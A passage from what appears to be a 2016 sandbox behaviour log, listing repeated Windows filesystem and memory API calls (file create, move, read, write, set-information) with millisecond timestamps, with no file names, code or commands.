"2016-02-16 17:41:50,515", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,515", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,515", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,525", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,525", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,535", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,535", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,545", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,545", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,555", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,555", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,565", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,565", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,575", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,575", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,575", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,585", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,585", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,595", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,595", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,605", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,605", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:50,615", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,615", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,615", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,625", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,625", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,635", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:50,635", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,635", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,635", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,645", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:50,645", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,645", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,645", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,655", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,655", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,665", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,665", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,675", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,675", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,685", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,685", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,695", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,695", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,705", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,705", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,715", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,715", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:50,725", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,725", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,735", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,735", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,735", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,735", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,735", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,745", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,745", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:50,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,755", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,755", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,755", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,765", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,765", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,775", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,775", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,785", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,785", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:50,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,795", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:50,805", "api": 
